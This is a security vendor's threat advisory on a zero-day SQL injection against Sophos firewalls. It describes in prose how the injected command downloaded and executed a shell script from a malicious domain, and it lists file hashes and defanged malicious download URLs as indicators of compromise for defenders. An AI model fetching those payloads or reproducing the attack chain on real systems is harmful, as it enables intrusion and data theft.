Rewterz Threat Advisory – CVE-2020-5867 – F5 NGINX Controller
April 27, 2020Rewterz Threat Advisory – CVE-2020-5870 – F5 BIG-IQ Centralized Management
April 28, 2020Rewterz Threat Advisory – CVE-2020-5867 – F5 NGINX Controller
April 27, 2020Rewterz Threat Advisory – CVE-2020-5870 – F5 BIG-IQ Centralized Management
April 28, 2020Severity
High
Analysis Summary
Unknown threat actors have targeted Sophos in a previously unknown SQL injection vulnerability that led to remote code execution on some of firewall products. Sophos has already provided with the hotfix to their customers which can prevent them from this attack.
How the Attack Happened
The infection process started when an attacker discovered, and exploited, a zero-day SQL injection remote code execution vulnerability. The exploit of this vulnerability resulted in the attacker being able to insert a one-line command into a database table.
This initial injected command triggered an affected device to download a Linux shell script named Install.sh from a remote server on the malicious domain sophosfirewallupdate[.]com. The command also wrote this shell script to the /tmp directory on the device, used the chmod program to designate the file as executable, and executed it.
The script (written to the appliance as x.sh) ran a series of SQL commands and dropped additional files into the virtual file system to lay the groundwork for the rest of the attack.
The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself.
Impact
- SQL injection
- Remote code execution
- Data exfiltration
Affected Vendors
Sophos
Indicators of Compromise
SHA-256
- 736da16da96222d3dfbb864376cafd58239344b536c75841805c661f220072e5
- a226c6a641291ef2916118b048d508554afe0966974c5ca241619e8a375b8c6b
- 4de3258ebba1ef3638642a011020a004b4cd4dbe8cd42613e24edf37e6cf9d71
- 9650563aa660ccbfd91c0efc2318cf98bfe9092b4a2abcd98c7fc44aad265fda
- 8e9965c2bb0964fde7c1aa0e8b5d74158e37443d857fc227c1883aa74858e985
- 31e43ecd203860ba208c668a0e881a260ceb24cb1025262d42e03209aed77fe4
URL
- hxxps[:]//sophosfirewallupdate[.]com/sp/Install[.]sh
- hxxp[:]//sophosfirewallupdate[.]com/sh_guard/lc
- hxxps[:]//sophosfirewallupdate[.]com/bk
- hxxps[:]//sophosfirewallupdate[.]com/sp/lp
- hxxps[:]//ragnarokfromasgard[.]com/sp/patch[.]sh
- hxxps[:]//sophosfirewallupdate[.]com/sp/sophos[.]dat
- hxxps[:]//sophosfirewallupdate[.]com/in_exit
- hxxps[:]//sophosfirewallupdate[.]com/sp/lpin
- hxxp[:]//sophosfirewallupdate[.]com/bkin
- hxxp[:]//filedownloaderservers[.]com/bkin
- hxxps[:]//sophosfirewallupdate[.]com/sp/p[.]sh
- hxxps[:]//sophosfirewallupdate[.]com/sp/ae[.]sh
Remediation
A hotfix is available for the customers to patch the vulnerability. However, customers who do not have automatic updates enable can follow the instructions here.